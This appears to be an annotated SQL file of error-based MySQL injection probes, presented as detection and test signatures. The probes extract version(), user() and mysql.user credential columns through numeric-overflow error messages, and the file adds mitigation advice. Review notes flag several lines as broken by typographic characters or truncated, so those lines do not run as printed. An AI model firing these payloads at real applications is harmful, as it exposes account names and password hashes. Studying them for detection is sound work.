-- Error-based SQL injection probes for MySQL, useful as detection and test
-- signatures. Each statement forces a numeric out-of-range error; the error
-- text quotes the failing expression, and on server versions where that text
-- includes the evaluated subquery it carries the subquery's value (here
-- version()). Nothing is disclosed unless the application returns raw
-- database errors to the client, so generic error pages and parameterized
-- queries both close this channel.

-- 1E308 * 2 exceeds the DOUBLE range. Both IF branches are 2, so the condition
-- is evaluated only to place the subquery inside the failing expression.
select 1E308*if((select*from(select version())x),2,2)
-- A 0/1 boolean minus a large negative constant exceeds the signed BIGINT range.
-- NOTE(review): the "–" is a typographic dash left by page rendering, not an
-- ASCII minus; the line is not valid SQL as printed.
SELECT (i IS NOT NULL) – -9223372036854775808 FROM (SELECT (version())i)a
-- Same DOUBLE overflow as the first statement, with the operands swapped.
select if(x,2,2)*1E308 from(select version()x)y
-- 获取字段名称 (retrieve column names)
-- Numeric-overflow probes whose IF condition compares two one-row subqueries
-- over the same table (test.shop, then mysql.user). Both IF branches hold the
-- same constant, so the comparison exists only to put the table's columns
-- into the expression that the out-of-range error quotes; the page labels
-- these as column-name retrieval.
-- Detection: the constants 18446744073709551610 and 1E308 multiplied by an
-- IF(...) that wraps a subquery are not something normal application SQL
-- produces.
-- Mitigation: the application's database account should hold no SELECT
-- privilege on mysql.user, and error text should never reach the client.
-- NOTE(review): the "“" after the derived table is a typographic quote left
-- by page rendering; neither line is valid SQL as printed.

-- 2 * 18446744073709551610 exceeds the BIGINT UNSIGNED maximum
-- (18446744073709551615).
SELECT 2 * if((SELECT * from (select * from test.shop) as “ limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
-- DOUBLE variant: 1E308 * 2 is out of range.
select 1E308*if((select*from(select*from mysql.user)“limit 1)>(select*from mysql.user limit 1),2,2)
-- 获取所有字段值 (retrieve all column values)
-- BIGINT UNSIGNED overflow probe (2 * 18446744073709551610) whose IF condition
-- compares one row of mysql.user against a 42-element row constructor.
-- A row comparison needs equal column counts on both sides, so the literal
-- list is presumably sized to the mysql.user layout of one server version
-- (confirm against the target schema before reusing this as a test case).
-- The page labels this as retrieval of all column values through the error
-- text. mysql.user holds account names and password hashes, so a hit means
-- that the injectable account is over-privileged as well.
-- NOTE(review): the "“" is a typographic quote left by page rendering; the
-- line is not valid SQL as printed.
SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as “ limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
-- 相当于 (equivalent to)
-- DOUBLE-overflow form (1E308 * IF(...)) of a probe that reads one row of
-- mysql.user through a derived table with an empty backtick alias.
-- NOTE(review): as printed the IF call is incomplete: it has no branch
-- arguments and its opening parenthesis is never closed, so this line is a
-- truncated fragment rather than a runnable statement.
select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)
-- 获取指定字段值 (retrieve specific column values)
-- DOUBLE-overflow probe (1E308 * 2) whose IF condition names four mysql.user
-- columns: user, host, password and file_priv. Both IF branches are 2, so the
-- condition matters only because the out-of-range error quotes it.
-- "||" is logical OR under MySQL's default sql_mode and string concatenation
-- under PIPES_AS_CONCAT; in both modes the column references are part of the
-- quoted expression.
-- Defensive reading: any request parameter that references mysql.user
-- credential columns is a high-confidence injection indicator, and the
-- application account should not be able to read that table at all.
select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)
-- 获取字段个数 (retrieve the number of columns)
-- Compares a full mysql.user row with a one-column subquery. MySQL rejects
-- mismatched operand widths with "Operand should contain N column(s)", and
-- the page labels this as column-count retrieval.
select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)
-- Conditional variant: the IF branches differ (1e308 versus 0), so 2 * 1e308
-- overflows DOUBLE only when the condition is true. "|" is bitwise OR here,
-- where the next statement uses "||".
select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);
-- Unconditional DOUBLE overflow (2 * 1E308) with the multiplication written
-- after the IF instead of before it.
select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308
-- BIGINT-range variant driven by version().
-- NOTE(review): the "–" is a typographic dash left by page rendering, and the
-- original operator sequence cannot be recovered from this page; the line is
-- not valid SQL as printed.
select (x!=0x00)–9223372036854775808 from(SELECT version()x)y
-- ~0 is the BIGINT UNSIGNED maximum, so subtracting it from the 0/1 result of
-- !x leaves the unsigned range. The statement contains no whitespace between
-- tokens, so detection rules should not rely on spaces around SQL keywords.
select!x-~0.FROM(select+user()x)f;